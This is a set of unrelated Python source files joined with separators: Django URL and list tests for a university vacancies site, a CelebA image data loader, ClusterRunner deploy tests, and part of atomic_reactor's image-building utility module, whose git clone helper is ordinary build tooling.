response = self.client.get('/studentships-archive/medicine/')
self.assertEqual(response.status_code, 404)
def test_no_auto_page_bogus_entity_archived_studentships_url(self):
self.school.auto_vacancies_page= False
self.school.save()
response = self.client.get('/studentships-archive/xxxx/')
self.assertEqual(response.status_code, 404)
def test_no_auto_page_main_all_current_studentships_url(self):
self.school.auto_vacancies_page= False
self.school.save()
response = self.client.get('/current-studentships/')
self.assertEqual(response.status_code, 404)
def test_no_auto_page_entity_all_current_studentships_url(self):
self.school.auto_vacancies_page = False
self.school.save()
response = self.client.get('/current-studentships/medicine/')
self.assertEqual(response.status_code, 404)
def test_no_auto_page_bogus_entity_all_current_studentships_url(self):
self.school.auto_vacancies_page= False
self.school.save()
response = self.client.get('/current-studentships/xxx/')
self.assertEqual(response.status_code, 404)
# entity vacancies and studentships URLs - no entity home page
def test_no_entity_home_page_main_url(self):
self.school.website = None
self.school.save()
response = self.client.get('/vacancies-and-studentships/')
self.assertEqual(response.status_code, 404)
def test_no_entity_home_page_entity_url(self):
self.school.website = None
self.school.save()
response = self.client.get('/vacancies-and-studentships/medicine/')
self.assertEqual(response.status_code, 404)
def test_no_entity_home_page_bogus_entity_url(self):
self.school.website = None
self.school.save()
response = self.client.get('/vacancies-and-studentships/xxxx/')
self.assertEqual(response.status_code, 404)
def test_no_entity_home_page_main_archive_url(self):
self.school.website = None
self.school.save()
response = self.client.get('/archived-vacancies/')
self.assertEqual(response.status_code, 404)
def test_no_entity_home_page_entity_vacancies_archive_url(self):
self.school.website = None
self.school.save()
response = self.client.get('/archived-vacancies/medicine/')
self.assertEqual(response.status_code, 404)
def test_no_entity_home_page_bogus_entity_vacancies_archive_url(self):
self.school.website = None
self.school.save()
response = self.client.get('/archived-vacancies/xxxx/')
self.assertEqual(response.status_code, 404)
def test_no_entity_home_page_main_archived_studentships_url(self):
self.school.website = None
self.school.save()
response = self.client.get('/studentships-archive/')
self.assertEqual(response.status_code, 404)
def test_no_entity_home_page_entity_archived_studentships_url(self):
self.school.website = None
self.school.save()
response = self.client.get('/studentships-archive/medicine/')
self.assertEqual(response.status_code, 404)
def test_no_entity_home_page_bogus_entity_archived_studentships_url(self):
self.school.website = None
self.school.save()
response = self.client.get('/studentships-archive/xxxx/')
self.assertEqual(response.status_code, 404)
def test_no_entity_home_page_main_all_current_studentships_url(self):
self.school.website = None
self.school.save()
response = self.client.get('/current-studentships/')
self.assertEqual(response.status_code, 404)
def test_no_entity_home_page_entity_all_current_studentships_url(self):
self.school.website = None
self.school.save()
response = self.client.get('/current-studentships/medicine/')
self.assertEqual(response.status_code, 404)
def test_no_entity_home_page_bogus_entity_all_current_studentships_url(self):
self.school.website = None
self.school.save()
response = self.client.get('/current-studentships/xxx/')
self.assertEqual(response.status_code, 404)
class ListTests(TestCase):
def setUp(self):
self.item1 = Vacancy(
title="closes today, less important",
in_lists=True,
published=True,
date=datetime.now()
)
self.item1.save()
self.item2 = Vacancy(
title="closed 20 days ago, important",
summary="a job for today",
in_lists=True,
published=True,
date=datetime.now()-timedelta(days=20),
importance=3,
slug="item2"
)
self.item2.save()
self.item3 = Vacancy(
title="closes in the future",
in_lists=True,
published=True,
date=datetime.now()+timedelta(days=20),
importance=3,
slug="item3"
)
self.item3.save()
self.itemlist = List()
self.itemlist.model = Vacancy
self.itemlist.items = Vacancy.objects.all()
def test_all_items_order(self):
self.assertEqual(
list(self.itemlist.items),
[self.item2, self.item1, self.item3]
)
def test_reorder_by_importance_date_only(self):
# check the re-ordered items are not changed
self.itemlist.re_order_by_importance()
self.assertEqual(
list(self.itemlist.items),
[self.item2, self.item1, self.item3]
)
def test_reorder_by_importance_date_makes_no_difference(self):
# check that items are re-ordered by importance
self.itemlist.order_by = "importance/date"
self.itemlist.re_order_by_importance()
self.assertEqual(
list(self.itemlist.items),
[self.item2, self.item1, self.item3]
)
def test_truncate_items(self):
# check that the list of items is truncated to limit_to items
self.itemlist.limit_to = 1
self.itemlist.truncate_items()
self.assertEqual(
list(self.itemlist.items),
[self.item2]
)
def test_set_items_for_person(self):
p = Person()
p.save()
self.item1.please_contact.add(p)
self.itemlist.person = p
self.itemlist.set_items_for_person()
self.assertEqual(
list(self.itemlist.items),
[self.item1]
)
def test_build(self):
self.itemlist.build()
self.assertEqual(list(self.itemlist.items), [self.item1, self.item3])
def test_other_items(self):
school = Entity(name="School of Medicine", short_name="Medicine")
school.save()
self.itemlist.entity = school
self.itemlist.other_item_kinds = ["archived", "open", "main"]
self.itemlist.build()
# "main" other items are always created; the others need tests to
# see if any exist
self.assertEqual(
self.itemlist.other_items(),
[{
'link': '/vacancies-and-studentships/',
'title': u'Medicine vacancies & studentships',
'css_class': 'main',
}]
)
# now we save some items
self.item1.hosted_by = school
self.item2.hosted_by = school
self.item3.hosted_by = school
self.item1.save()
self.item2.save()
self.item3.save()
self.itemlist.build()
self.assertEqual(list(self.itemlist.items), [self.item1, self.item3])
self.assertEqual(list(self.itemlist.archived), [self.item2])
self.assertEqual(
list(self.itemlist.other_items()),
[{
'count': 2,
'link': '/vacancies/',
'title': 'All open vacancies'
},
{
'count': 1,
'link': '/archived-vacancies/',
'title': 'Archived vacancies'
},
{
'link': '/vacancies-and-studentships/',
'title': u'Medicine vacancies & studentships',
'css_class': 'main',
},
]
)
class FilterListTests(TestCase):
def setUp(self):
self.item1 = Vacancy(
title="closes today, less important",
in_lists=True,
published=True,
date=datetime.now()
)
self.item1.save()
self.item2 = Vacancy(
title="closed 20 days ago, important",
summary="a job for today",
in_lists=True,
published=True,
date=datetime.now()-timedelta(days=20),
importance=3,
slug="item2"
)
self.item2.save()
self.item3 = Vacancy(
title="closes in the future",
in_lists=True,
published=True,
date=datetime.now()+timedelta(days=20),
importance=3,
slug="item3"
)
self.item3.save()
self.itemlist = FilterList()
self.itemlist.model = Vacancy
self.itemlist.request = HttpRequest()
def test_filter_on_search_terms_no_terms(self):
query = QueryDict("")
self.itemlist.request.GET = query
self.itemlist.build()
self.assertEqual(
list(self.itemlist.items),
[self.item1, self.item3]
)
def test_filter_on_search_terms_1_match(self):
query = QueryDict("text=today")
self.itemlist.request.GET = query
self.itemlist.build()
self.assertEqual(
list(self.itemlist.items),
[self.item1]
)
class PluginListerTests(TestCase):
def test_other_items(self):
lister = VacanciesAndStudentshipsPluginLister(
entity=Entity(slug="test")
)
self.assertItemsEqual(
lister.other_items(),
[{
'css_class': 'main',
'link': '/vacancies-and-studentships/test/',
'title': 'More '
}]
)
|
|
import os
import cv2
import numpy as np
import threading
import random
from multiprocessing.dummy import Pool
from multiprocessing import cpu_count
class Net:
def __init__(self, subset_name='train', options = None):
""" Module for loading CelebA data
:param subset_name: "train", "validation", "test"
:param cache_dir: (default) "var/data/OMNIGLOT"
"""
if subset_name == 'train':
self._mode = '0'
elif subset_name == 'validation':
self._mode = '1'
elif subset_name == 'test':
self._mode = '2'
else:
self._mode = '0'
self._subset_name = subset_name
self._debug = False
self._shuffle = False
self._cache_size = 3000
self._mean_reduce = False
self._mean = [5.0, 10.0, 15.0]
if options != None and options != {}:
if 'cache_size' in options:
self._cache_size = options['cache_size']
if 'mean_reduce' in options:
self._mean_reduce = options['mean_reduce']
if 'shuffle' in options:
self._shuffle = options['shuffle']
if 'debug' in options:
self._debug = options['debug']
current_path = os.path.dirname(os.path.abspath(__file__))
root_path = current_path[:-9]
self._imname = root_path+'data/celeba_images/Eval/list_eval_partition.txt'
self._maflname_train = root_path+'data/celeba_data/training.txt'
self._maflname_test = root_path+'data/celeba_data/testing.txt'
self._impath = root_path+'data/celeba_images/Img/img_align_celeba_png/'
with open(self._imname, 'r') as f:
self._lines = f.read().splitlines()
self._imlist = [line.split(' ')[0] for line in self._lines if line.split(' ')[1] == self._mode]
self._celeba_test = [line.split(' ')[0] for line in self._lines if line.split(' ')[1] == '2']
with open(self._maflname_train, 'r') as f:
self._lines = f.read().splitlines()
self._mafllist_train = [line.split(' ')[0] for line in self._lines]
with open(self._maflname_test, 'r') as f:
self._lines = f.read().splitlines()
self._mafllist_test = [line.split(' ')[0] for line in self._lines]
if subset_name == 'train':
self._imlist = sorted(list(set(self._imlist)-set(self._mafllist_test)))
if subset_name == 'mafl_train':
self._imlist = self._mafllist_train
if subset_name == 'test':
self._imlist = self._mafllist_test
if subset_name == 'celeba_test':
self._imlist = self._celeba_test
if subset_name == 'demo':
import glob
self._imlist = sorted(glob.glob(root_path+'demo/input/*.jpg'))
if "chosen_indexes" in options and options["chosen_indexes"] is not None:
chosen_index = options["chosen_indexes"]
self._imlist = list(self._imlist[i] for i in chosen_index)
self._num_samples = len(self._imlist)
self._waitlist = list(range(len(self._imlist)))
if self._shuffle:
random.shuffle(self._waitlist)
self._dataset = None
self._cur_pos = 0 # num of sample done in this epoch
self._cur_epoch = 0 # current num of epoch
self._cur_iter = 0 # num of batches returned
self._num_fields = 1 # number of fields to return (just the image here)
self._out_h = 80
self._out_w = 80
self._image_cache = []
self._lock = threading.Lock()
self._pool_size = cpu_count()
self._pool = Pool(self._pool_size)
self._cache_thread = threading.Thread(target=self.preload_dataset)
self._cache_thread.start()
def read_image(self, i):
if self._subset_name == 'demo':
image_name = self._imlist[i]
image_arr = cv2.imread(image_name)
image_arr = cv2.resize(image_arr, (80, 80))
result = image_arr.astype(np.float32) / np.array(255., dtype=np.float32)
else:
image_name = self._impath + self._imlist[i].split('.')[0] + '.png'
# The channel for cv2.imread is B, G, R
image_arr = cv2.imread(image_name)
image_arr = cv2.resize(image_arr, (100, 100))
height, width, channels = image_arr.shape
margin_h = int(np.round((height - self._out_h) / 2))
margin_w = int(np.round((width - self._out_w) / 2))
cropped_im = image_arr[margin_h:self._out_h + margin_h, margin_w:self._out_w + margin_w, :]
result = cropped_im.astype(np.float32) / np.array(255., dtype=np.float32)
result[:, :, [0, 1, 2]] = result[:, :, [2, 1, 0]]
return result
def __call__(self, *args, **kwargs):
return self.next_batch(*args, **kwargs)
def num_samples(self):
return self._num_samples
def epoch(self):
return self._cur_epoch
def iter(self):
return self._cur_iter
def num_fields(self):
return self._num_fields
def num_samples_finished(self):
return self._cur_pos
def reset(self):
""" Reset the state of the data loader
E.g., the reader points at the beginning of the dataset again
:return: None
"""
self._cur_pos = 0
self._cur_epoch = 0
self._cur_iter = 0
self._waitlist = list(range(len(self._imlist)))
if self._shuffle:
random.shuffle(self._waitlist)
# wait for any in-flight preload to finish before clearing the cache
self._cache_thread.join()
self._cache_thread = threading.Thread(target=self.preload_dataset)
self._lock.acquire()
self._image_cache = []
self._lock.release()
self._cache_thread.start()
def preload_dataset(self):
if self._debug:
print("preload")
if len(self._image_cache) > self._cache_size:
return
else:
while len(self._image_cache) < 1000:
if len(self._waitlist) < 1000:
self._waitlist += list(range(len(self._imlist)))
if self._shuffle:
random.shuffle(self._waitlist)
results = self._pool.map(self.read_image, self._waitlist[:1000])
del self._waitlist[:1000]
self._lock.acquire()
self._image_cache = self._image_cache + results
self._lock.release()
if self._debug:
print(len(self._image_cache))
def next_batch(self, batch_size):
""" fetch the next batch
:param batch_size: next batch_size
:return: a tuple includes all data
"""
if batch_size < 0:
batch_size = 0
if self._cache_size < 3 * batch_size:
self._cache_size = 3 * batch_size
this_batch = [None] * self._num_fields
if len(self._image_cache) < batch_size:
if self._debug:
print("Blocking!!, Should only appear once with proper setting")
if not self._cache_thread.isAlive():
self._cache_thread = threading.Thread(target=self.preload_dataset)
self._cache_thread.start()
self._cache_thread.join()
self._lock.acquire()
this_batch[0] = self._image_cache[0:batch_size]
del self._image_cache[0:batch_size]
self._lock.release()
else:
self._lock.acquire()
this_batch[0] = self._image_cache[0:batch_size]
del self._image_cache[0:batch_size]
self._lock.release()
if not self._cache_thread.isAlive():
self._cache_thread = threading.Thread(target=self.preload_dataset)
self._cache_thread.start()
self._cur_iter += 1
self._cur_pos = self._cur_pos + batch_size
if self._cur_pos >= self._num_samples:
self._cur_epoch += 1
self._cur_pos = self._cur_pos % self._num_samples
return this_batch
@staticmethod
def output_types(): # only used for net instance
t = ["float32"]
return t
@staticmethod
def output_shapes():
t = [(None, 80, 80, 3)] # None for batch size
return t
@staticmethod
def output_ranges():
return [1.]
@staticmethod
def output_keys():
return ["data"]
if __name__ == '__main__':
# NOTE: no main() is defined in this module; as a minimal smoke check, instantiate
# the loader directly (requires the CelebA files referenced in __init__).
print(Net('train').num_samples())
|
|
from functools import partial
from os.path import join, expanduser
from unittest.mock import MagicMock
import uuid
from genty import genty, genty_dataset, genty_args
from app.subcommands.deploy_subcommand import DeploySubcommand
from app.util.network import Network
from test.framework.base_unit_test_case import BaseUnitTestCase
@genty
class TestDeploySubcommand(BaseUnitTestCase):
def setUp(self):
super().setUp()
self.patch('app.subcommands.deploy_subcommand.fs.tar_directory')
def test_binaries_tar_raises_exception_if_running_from_source(self):
deploy_subcommand = DeploySubcommand()
with self.assertRaisesRegex(SystemExit, '1'):
deploy_subcommand._binaries_tar('python main.py deploy', '~/.clusterrunner/dist')
def test_binaries_doesnt_raise_exception_if_running_from_bin(self):
self.patch('os.path.isfile').return_value = True
deploy_subcommand = DeploySubcommand()
deploy_subcommand._binaries_tar('clusterrunner', '~/.clusterrunner/dist')
def test_deploy_binaries_and_conf_deploys_both_conf_and_binary_for_remote_host(self):
mock_DeployTarget = self.patch('app.subcommands.deploy_subcommand.DeployTarget')
mock_DeployTarget_instance = mock_DeployTarget.return_value
deploy_subcommand = DeploySubcommand()
deploy_subcommand._deploy_binaries_and_conf(
'remote_host', 'username', 'exec', '/path/to/exec', '/path/to/conf')
self.assertTrue(mock_DeployTarget_instance.deploy_binary.called)
self.assertTrue(mock_DeployTarget_instance.deploy_conf.called)
@genty_dataset(
# expect to deploy the binary but not the conf when the current executable path is not the same
# as the target executable path but the current conf path is the same as the target conf path
same_conf_path_different_exe_path=genty_args(
current_executable=join(expanduser('~'), '.clusterrunner', 'dist', 'clusterrunner2'),
in_use_conf_path=join(expanduser('~'), '.clusterrunner', 'clusterrunner.conf'),
expect_deploy_conf=False,
expect_deploy_binary=True,
),
# expect not to deploy the binary or the conf when the current executable path is the same
# as the target executable path and the current conf path is the same as the target conf path
same_conf_path_same_exe_path=genty_args(
current_executable=join(expanduser('~'), '.clusterrunner', 'dist', 'clusterrunner'),
in_use_conf_path=join(expanduser('~'), '.clusterrunner', 'clusterrunner.conf'),
expect_deploy_conf=False,
expect_deploy_binary=False,
),
# expect to deploy the conf but not the binary when the current conf path is not the same
# as the target conf path but the current binary path is the same as the target binary path
different_conf_path_same_exe_path=genty_args(
current_executable=join(expanduser('~'), '.clusterrunner', 'dist', 'clusterrunner'),
in_use_conf_path=join(expanduser('~'), '.clusterrunner', 'clusterrunner2.conf'),
expect_deploy_conf=True,
expect_deploy_binary=False,
),
# expect to deploy the binary and the conf when the current executable path is not the same
# as the target executable path and the current conf path is not the same as the target conf path
different_conf_path_different_exe_path=genty_args(
current_executable=join(expanduser('~'), '.clusterrunner', 'dist', 'clusterrunner2'),
in_use_conf_path=join(expanduser('~'), '.clusterrunner', 'clusterrunner2.conf'),
expect_deploy_conf=True,
expect_deploy_binary=True,
),
)
def test_deploy_binaries_and_conf_behaves_properly_if_conf_or_binary_is_in_use_on_localhost(
self,
current_executable,
in_use_conf_path,
expect_deploy_conf,
expect_deploy_binary,
):
mock_DeployTarget = self.patch('app.subcommands.deploy_subcommand.DeployTarget')
mock_DeployTarget_instance = mock_DeployTarget.return_value
deploy_subcommand = DeploySubcommand()
deploy_subcommand._deploy_binaries_and_conf(
'localhost',
'username',
current_executable,
join(expanduser('~'), '.clusterrunner', 'clusterrunner.tgz'),
in_use_conf_path
)
self.assertEqual(expect_deploy_binary, mock_DeployTarget_instance.deploy_binary.called)
self.assertEqual(expect_deploy_conf, mock_DeployTarget_instance.deploy_conf.called)
def test_non_registered_slaves_returns_empty_list_if_all_registered(self):
registered_hosts = ['host_1', 'host_2']
slaves_to_validate = ['host_1', 'host_2']
def get_host_id(*args, **kwargs):
if args[0] == 'host_1':
return 'host_id_1'
elif args[0] == 'host_2':
return 'host_id_2'
else:
return 'blah'
old_host_id = Network.get_host_id
Network.get_host_id = get_host_id
deploy_subcommand = DeploySubcommand()
non_registered = deploy_subcommand._non_registered_slaves(registered_hosts, slaves_to_validate)
Network.get_host_id = old_host_id
self.assertEquals(0, len(non_registered))
def test_non_registered_slaves_returns_non_registered_slaves(self):
registered_hosts = ['host_1', 'host_3']
slaves_to_validate = ['host_1', 'host_2', 'host_3', 'host_4']
def get_host_id(*args, **kwargs):
if args[0] == 'host_1':
return 'host_id_1'
elif args[0] == 'host_2':
return 'host_id_2'
elif args[0] == 'host_3':
return 'host_id_3'
elif args[0] == 'host_4':
return 'host_id_4'
else:
return 'blah'
self.patch('app.util.network.Network.get_host_id', new=get_host_id)
deploy_subcommand = DeploySubcommand()
non_registered = deploy_subcommand._non_registered_slaves(registered_hosts, slaves_to_validate)
self.assertEquals(len(non_registered), 2)
self.assertTrue('host_2' in non_registered)
self.assertTrue('host_4' in non_registered)
def test_non_registered_slaves_returns_empty_list_with_slaves_with_same_host_ids_but_different_names(self):
registered_hosts = ['host_1_alias', 'host_2_alias']
slaves_to_validate = ['host_1', 'host_2']
def get_host_id(*args, **kwargs):
if args[0] == 'host_1':
return 'host_id_1'
elif args[0] == 'host_2':
return 'host_id_2'
elif args[0] == 'host_1_alias':
return 'host_id_1'
elif args[0] == 'host_2_alias':
return 'host_id_2'
else:
return 'blah'
self.patch('app.util.network.Network.get_host_id', new=get_host_id)
deploy_subcommand = DeploySubcommand()
non_registered = deploy_subcommand._non_registered_slaves(registered_hosts, slaves_to_validate)
self.assertEquals(0, len(non_registered))
@genty_dataset(
valid_deployment=genty_args(
slaves_to_validate=['slave_host_1', 'slave_host_2'],
connected_slaves=['slave_host_1', 'slave_host_2'],
host_name_to_uid={
'slave_host_1': 'host_1_id',
'slave_host_2': 'host_2_id',
},
is_valid=True,
),
host_mismatch=genty_args(
slaves_to_validate=['slave_host_1', 'slave_host_2'],
connected_slaves=['slave_host_3', 'slave_host_2'],
host_name_to_uid={
'slave_host_2': 'host_2_id',
},
is_valid=False,
),
number_of_slaves_not_match=genty_args(
slaves_to_validate=['slave_host_1'],
connected_slaves=['slave_host_1', 'slave_host_2'],
host_name_to_uid={
'slave_host_1': 'host_1_id',
},
is_valid=False,
),
valid_deployment_different_host_names_with_same_host_id=genty_args(
slaves_to_validate=['slave_host_1', 'slave_host_2'],
connected_slaves=['slave_host_1_alias', 'slave_host_2'],
host_name_to_uid={
'slave_host_1': 'host_1_id',
'slave_host_1_alias': 'host_1_id',
'slave_host_2': 'host_2_id',
},
is_valid=True,
),
)
def test_validate_deployment_checks_each_slave_is_connected(
self,
slaves_to_validate,
connected_slaves,
host_name_to_uid,
is_valid,
):
def get_host_id(host):
if host in host_name_to_uid:
return host_name_to_uid[host]
else:
return str(uuid.uuid4())
self.patch('app.util.network.Network.get_host_id', new=get_host_id)
deploy_subcommand = DeploySubcommand()
deploy_subcommand._registered_slave_hostnames = MagicMock(return_value=connected_slaves)
deploy_subcommand._SLAVE_REGISTRY_TIMEOUT_SEC = 1
deploy_subcommand._non_registered_slaves = MagicMock()
validate = partial(deploy_subcommand._validate_successful_deployment, 'master_host_url', slaves_to_validate)
if not is_valid:
with self.assertRaises(SystemExit):
validate()
else:
validate()
|
|
"""
Copyright (c) 2015 Red Hat, Inc
All rights reserved.
This software may be modified and distributed under the terms
of the BSD license. See the LICENSE file for details.
"""
from __future__ import print_function, unicode_literals
import hashlib
import json
import jsonschema
import os
import re
from pipes import quote
import requests
from requests.exceptions import ConnectionError, SSLError, HTTPError, RetryError, Timeout
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util import Retry
import shutil
import subprocess
import tempfile
import logging
import uuid
import yaml
import codecs
import string
import time
from six.moves.urllib.parse import urlparse
from atomic_reactor.constants import (DOCKERFILE_FILENAME, FLATPAK_FILENAME, TOOLS_USED,
INSPECT_CONFIG,
IMAGE_TYPE_DOCKER_ARCHIVE, IMAGE_TYPE_OCI, IMAGE_TYPE_OCI_TAR,
HTTP_MAX_RETRIES, HTTP_BACKOFF_FACTOR,
HTTP_CLIENT_STATUS_RETRY, HTTP_REQUEST_TIMEOUT,
MEDIA_TYPE_DOCKER_V2_SCHEMA1, MEDIA_TYPE_DOCKER_V2_SCHEMA2,
MEDIA_TYPE_DOCKER_V2_MANIFEST_LIST, MEDIA_TYPE_OCI_V1,
MEDIA_TYPE_OCI_V1_INDEX, GIT_MAX_RETRIES, GIT_BACKOFF_FACTOR)
from dockerfile_parse import DockerfileParser
from pkg_resources import resource_stream
from importlib import import_module
from requests.utils import guess_json_utf
logger = logging.getLogger(__name__)
class ImageName(object):
def __init__(self, registry=None, namespace=None, repo=None, tag=None):
self.registry = registry
self.namespace = namespace
self.repo = repo
self.tag = tag
@classmethod
def parse(cls, image_name):
result = cls()
# registry.org/namespace/repo:tag
s = image_name.split('/', 2)
if len(s) == 2:
if '.' in s[0] or ':' in s[0]:
result.registry = s[0]
else:
result.namespace = s[0]
elif len(s) == 3:
result.registry = s[0]
result.namespace = s[1]
result.repo = s[-1]
for sep in '@:':
try:
result.repo, result.tag = result.repo.rsplit(sep, 1)
except ValueError:
continue
break
return result
def to_str(self, registry=True, tag=True, explicit_tag=False,
explicit_namespace=False):
if self.repo is None:
raise RuntimeError('No image repository specified')
result = self.get_repo(explicit_namespace)
if tag and self.tag and ':' in self.tag:
result = '{0}@{1}'.format(result, self.tag)
elif tag and self.tag:
result = '{0}:{1}'.format(result, self.tag)
elif tag and explicit_tag:
result = '{0}:{1}'.format(result, 'latest')
if registry and self.registry:
result = '{0}/{1}'.format(self.registry, result)
return result
def get_repo(self, explicit_namespace=False):
result = self.repo
if self.namespace:
result = '{0}/{1}'.format(self.namespace, result)
elif explicit_namespace:
result = '{0}/{1}'.format('library', result)
return result
@property
def pulp_repo(self):
return self.to_str(registry=False, tag=False).replace("/", "-")
def __str__(self):
return self.to_str(registry=True, tag=True)
def __repr__(self):
return "ImageName(image=%r)" % self.to_str()
def __eq__(self, other):
return type(self) == type(other) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
def __hash__(self):
return hash(self.to_str())
def copy(self):
return ImageName(
registry=self.registry,
namespace=self.namespace,
repo=self.repo,
tag=self.tag)
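# Illustrative examples for ImageName.parse (not from the original module):
#   ImageName.parse('registry.example.com/ns/repo:1.0')
#     -> registry='registry.example.com', namespace='ns', repo='repo', tag='1.0'
#   ImageName.parse('fedora')
#     -> repo='fedora'; registry, namespace and tag stay None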
def figure_out_build_file(absolute_path, local_path=None):
"""
try to figure out the build file (Dockerfile or flatpak.json) from provided
path and optionally from relative local path this is meant to be used with
git repo: absolute_path is path to git repo, local_path is path to dockerfile
within git repo
:param absolute_path:
:param local_path:
:return: tuple, (dockerfile_path, dir_with_dockerfile_path)
"""
logger.info("searching for dockerfile in '%s' (local path %s)", absolute_path, local_path)
logger.debug("abs path = '%s', local path = '%s'", absolute_path, local_path)
if local_path:
if local_path.endswith(DOCKERFILE_FILENAME) or local_path.endswith(FLATPAK_FILENAME):
git_build_file_dir = os.path.dirname(local_path)
build_file_dir = os.path.abspath(os.path.join(absolute_path, git_build_file_dir))
else:
build_file_dir = os.path.abspath(os.path.join(absolute_path, local_path))
else:
build_file_dir = os.path.abspath(absolute_path)
if not os.path.isdir(build_file_dir):
raise IOError("Directory '%s' doesn't exist." % build_file_dir)
# Check for flatpak.json first because we do flatpak.json => Dockerfile generation
build_file_path = os.path.join(build_file_dir, FLATPAK_FILENAME)
if os.path.isfile(build_file_path):
logger.debug("flatpak.json found: '%s'", build_file_path)
return build_file_path, build_file_dir
build_file_path = os.path.join(build_file_dir, DOCKERFILE_FILENAME)
if os.path.isfile(build_file_path):
logger.debug("Dockerfile found: '%s'", build_file_path)
return build_file_path, build_file_dir
raise IOError("Dockerfile '%s' doesn't exist." % build_file_path)
class CommandResult(object):
def __init__(self):
self._logs = []
self._parsed_logs = []
self._error = None
self._error_detail = None
def parse_item(self, item):
"""
:param item: dict, decoded log data
"""
# append here just in case .get below fails
self._parsed_logs.append(item)
# make sure the log item is a dictionary object
if isinstance(item, dict):
line = item.get("stream", "")
else:
line = item
item = None
for l in line.splitlines():
l = l.strip()
self._logs.append(l)
if l:
logger.debug(l)
if item is not None:
self._error = item.get("error", None)
self._error_detail = item.get("errorDetail", None)
if self._error:
logger.error(item)
@property
def parsed_logs(self):
return self._parsed_logs
@property
def logs(self):
return self._logs
@property
def error(self):
return self._error
@property
def error_detail(self):
return self._error_detail
def is_failed(self):
return bool(self.error) or bool(self.error_detail)
def wait_for_command(logs_generator):
"""
Create a CommandResult from given iterator
:return: CommandResult
"""
logger.info("wait_for_command")
cr = CommandResult()
for item in logs_generator:
cr.parse_item(item)
logger.info("no more logs")
return cr
def clone_git_repo(git_url, target_dir, commit=None, retry_times=GIT_MAX_RETRIES):
"""
clone provided git repo to target_dir, optionally checkout provided commit
:param git_url: str, git repo to clone
:param target_dir: str, filesystem path where the repo should be cloned
:param commit: str, commit to checkout, SHA-1 or ref
:param retry_times: int, number of retries for git clone
:return: str, commit ID of HEAD
"""
retry_delay = GIT_BACKOFF_FACTOR
commit = commit or "master"
logger.info("cloning git repo '%s'", git_url)
logger.debug("url = '%s', dir = '%s', commit = '%s'",
git_url, target_dir, commit)
cmd = ["git", "clone", git_url, quote(target_dir)]
logger.debug("cloning '%s'", cmd)
for counter in range(retry_times + 1):
try:
# we are using check_output, even though we aren't using
# the return value, but we will get 'output' in exception
subprocess.check_output(cmd, stderr=subprocess.STDOUT)
break
except subprocess.CalledProcessError as exc:
if counter != retry_times:
logger.info("retrying command '%s':\n '%s'", cmd, exc.output)
time.sleep(retry_delay * (2 ** counter))
else:
raise
cmd = ["git", "reset", "--hard", commit]
logger.debug("checking out branch '%s'", cmd)
subprocess.check_call(cmd, cwd=target_dir)
cmd = ["git", "rev-parse", "HEAD"]
logger.debug("getting SHA-1 of provided ref '%s'", cmd)
commit_id = subprocess.check_output(cmd, cwd=target_dir)
commit_id = commit_id.strip()
logger.info("commit ID = %s", commit_id)
return commit_id
class LazyGit(object):
"""
usage:
lazy_git = LazyGit(git_url="...")
with lazy_git:
lazy_git.git_path
or
lazy_git = LazyGit(git_url="...", tmpdir=tmp_dir)
lazy_git.git_path
"""
def __init__(self, git_url, commit=None, tmpdir=None):
self.git_url = git_url
# provided commit ID/reference to check out
self.commit = commit
# commit ID of HEAD; we'll figure this out ourselves
self._commit_id = None
self.provided_tmpdir = tmpdir
self._git_path = None
@property
def _tmpdir(self):
return self.provided_tmpdir or self.our_tmpdir
@property
def commit_id(self):
return self._commit_id
@property
def git_path(self):
if self._git_path is None:
self._commit_id = clone_git_repo(self.git_url, self._tmpdir, self.commit)
self._git_path = self._tmpdir
return self._git_path
def __enter__(self):
if not self.provided_tmpdir:
self.our_tmpdir = tempfile.mkdtemp()
def __exit__(self, exc_type, exc_val, exc_tb):
if not self.provided_tmpdir:
if self.our_tmpdir:
shutil.rmtree(self.our_tmpdir)
def escape_dollar(v):
try:
str_type = unicode
except NameError:
str_type = str
if isinstance(v, str_type):
return v.replace('$', r'\$')
else:
return v
def render_yum_repo(repo, escape_dollars=True):
repo.setdefault("name", str(uuid.uuid4().hex[:6]))
repo_name = repo["name"]
logger.info("rendering repo '%s'", repo_name)
rendered_repo = '[%s]\n' % repo_name
for key, value in repo.items():
if escape_dollars:
value = escape_dollar(value)
rendered_repo += "%s=%s\n" % (key, value)
logger.info("rendered repo: %r", rendered_repo)
return rendered_repo
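# Illustrative example (hypothetical repo dict, not from the original module):
#   render_yum_repo({'name': 'extras', 'baseurl': 'http://example.com/$basearch/'})
# yields "[extras]\n" followed by one "key=value" line per dict entry, with '$'
# escaped to '\$' unless escape_dollars=False is passed.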
def process_substitutions(mapping, substitutions):
"""Process `substitutions` for given `mapping` (modified in place)
:param mapping: a dict
:param substitutions: either a dict {key: value} or a list of ["key=value"] strings
keys can use dotted notation to change to nested dicts
Note: Plugin substitutions are processed differently - they are accepted in form of
plugin_type.plugin_name.arg_name, even though that doesn't reflect the actual
structure of given mapping.
Also note: For non-plugin substitutions, additional dicts/key/value pairs
are created on the way if they're missing. For plugin substitutions, only
existing values can be changed (TODO: do we want to change this behaviour?).
"""
def parse_val(v):
# TODO: do we need to recognize numbers,lists,dicts?
if v.lower() == 'true':
return True
elif v.lower() == 'false':
return False
elif v.lower() == 'none':
return None
return v
if isinstance(substitutions, list):
# if we got a list, get a {key: val} dict out of it
substitutions = dict([s.split('=', 1) for s in substitutions])
for key, val in substitutions.items():
cur_dict = mapping
key_parts = key.split('.')
if key_parts[0].endswith('_plugins'):
_process_plugin_substitution(mapping, key_parts, val)
else:
key_parts_without_last = key_parts[:-1]
# now go down mapping, following the dotted path; create empty dicts on way
for k in key_parts_without_last:
if k in cur_dict:
if not isinstance(cur_dict[k], dict):
cur_dict[k] = {}
else:
cur_dict[k] = {}
cur_dict = cur_dict[k]
cur_dict[key_parts[-1]] = parse_val(val)
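# Illustrative example (hypothetical mapping, not from the original module):
#   m = {'source': {'provider': 'git'}}
#   process_substitutions(m, ['source.uri=https://example.com/repo.git', 'flag=true'])
# leaves m == {'source': {'provider': 'git', 'uri': 'https://example.com/repo.git'},
#              'flag': True}; keys ending in '_plugins' instead take the
# plugin_type.plugin_name.arg_name form handled below.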
def _process_plugin_substitution(mapping, key_parts, value):
try:
plugin_type, plugin_name, arg_name = key_parts
except ValueError:
logger.error("invalid absolute path '%s': it requires exactly three parts: "
"plugin type, plugin name, argument name (dot separated)",
key_parts)
raise ValueError("invalid absolute path to plugin, it should be "
"plugin_type.plugin_name.argument_name")
logger.debug("getting plugin conf for '%s' with type '%s'",
plugin_name, plugin_type)
